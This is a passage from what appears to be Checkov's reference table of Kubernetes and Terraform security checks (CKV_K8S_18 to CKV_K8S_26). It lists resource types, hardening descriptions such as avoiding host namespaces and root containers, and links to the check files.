[ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2576 | CKV_K8S_18 | resource | Deployment | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2577 | CKV_K8S_18 | resource | Job | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2578 | CKV_K8S_18 | resource | Pod | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2579 | CKV_K8S_18 | resource | ReplicaSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2580 | CKV_K8S_18 | resource | ReplicationController | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2581 | CKV_K8S_18 | resource | StatefulSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2582 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2583 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2584 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2585 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2586 | CKV_K8S_19 | resource | CronJob | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2587 | CKV_K8S_19 | resource | DaemonSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2588 | CKV_K8S_19 | resource | Deployment | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2589 | CKV_K8S_19 | resource | Job | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2590 | CKV_K8S_19 | resource | Pod | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2591 | CKV_K8S_19 | resource | ReplicaSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2592 | CKV_K8S_19 | resource | ReplicationController | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2593 | CKV_K8S_19 | resource | StatefulSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2594 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2595 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2596 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2597 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2598 | CKV_K8S_20 | resource | CronJob | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2599 | CKV_K8S_20 | resource | DaemonSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2600 | CKV_K8S_20 | resource | Deployment | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2601 | CKV_K8S_20 | resource | DeploymentConfig | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2602 | CKV_K8S_20 | resource | Job | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2603 | CKV_K8S_20 | resource | Pod | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2604 | CKV_K8S_20 | resource | PodTemplate | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2605 | CKV_K8S_20 | resource | ReplicaSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2606 | CKV_K8S_20 | resource | ReplicationController | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2607 | CKV_K8S_20 | resource | StatefulSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2608 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2609 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2610 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2611 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2612 | CKV_K8S_21 | resource | ConfigMap | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2613 | CKV_K8S_21 | resource | CronJob | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2614 | CKV_K8S_21 | resource | DaemonSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2615 | CKV_K8S_21 | resource | Deployment | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2616 | CKV_K8S_21 | resource | Ingress | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2617 | CKV_K8S_21 | resource | Job | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2618 | CKV_K8S_21 | resource | Pod | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2619 | CKV_K8S_21 | resource | ReplicaSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2620 | CKV_K8S_21 | resource | ReplicationController | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2621 | CKV_K8S_21 | resource | Role | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2622 | CKV_K8S_21 | resource | RoleBinding | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2623 | CKV_K8S_21 | resource | Secret | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2624 | CKV_K8S_21 | resource | Service | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2625 | CKV_K8S_21 | resource | ServiceAccount | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2626 | CKV_K8S_21 | resource | StatefulSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2627 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2628 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2629 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2630 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2631 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2632 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2633 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2634 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2635 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2636 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2637 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2638 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2639 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2640 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2641 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2642 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2643 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2644 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2645 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2646 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2647 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2648 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2649 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2650 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2651 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2652 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2653 | CKV_K8S_22 | resource | CronJob | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2654 | CKV_K8S_22 | resource | DaemonSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2655 | CKV_K8S_22 | resource | Deployment | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2656 | CKV_K8S_22 | resource | DeploymentConfig | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2657 | CKV_K8S_22 | resource | Job | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2658 | CKV_K8S_22 | resource | Pod | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2659 | CKV_K8S_22 | resource | PodTemplate | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2660 | CKV_K8S_22 | resource | ReplicaSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2661 | CKV_K8S_22 | resource | ReplicationController | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2662 | CKV_K8S_22 | resource | StatefulSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2663 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2664 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2665 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2666 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2667 | CKV_K8S_23 | resource | CronJob | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2668 | CKV_K8S_23 | resource | DaemonSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2669 | CKV_K8S_23 | resource | Deployment | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2670 | CKV_K8S_23 | resource | Job | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2671 | CKV_K8S_23 | resource | Pod | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2672 | CKV_K8S_23 | resource | ReplicaSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2673 | CKV_K8S_23 | resource | ReplicationController | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2674 | CKV_K8S_23 | resource | StatefulSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2675 | CKV_K8S_24 | resource | PodSecurityPolicy | Do not allow containers with added capability | Kubernetes | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py) | -| 2676 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) | -| 2677 | CKV_K8S_25 | resource | CronJob | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2678 | CKV_K8S_25 | resource | DaemonSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2679 | CKV_K8S_25 | resource | Deployment | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2680 | CKV_K8S_25 | resource | DeploymentConfig | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2681 | CKV_K8S_25 | resource | Job | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2682 | CKV_K8S_25 | resource | Pod | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2683 | CKV_K8S_25 | resource | PodTemplate | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2684 | CKV_K8S_25 | resource | ReplicaSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2685 | CKV_K8S_25 | resource | ReplicationController | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2686 | CKV_K8S_25 | resource | StatefulSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2687 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2688 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2689 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2690 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2691 | CKV_K8S_26 | resource | CronJob | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2692 | CKV_K8S_26 | resource | DaemonSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2693 | CKV_K8S_26 | resource | Deployment | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2694 | CKV_K8S_26 | resource | DeploymentConfig | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2695 | CKV_K8S_26 | resource | Job | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2696 | CKV_K8S_26 | resource | Pod | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2697 | CKV_K8S_26 | resource | PodTemplate | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2698 | CKV_K8S_26 | resource | ReplicaSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2699 | CKV_K8S_26 | resource | ReplicationController | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2700 | CKV_K8S_26 | resource | StatefulSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2701 | CKV_K8S_26 | resource | kubernetes_deployment | 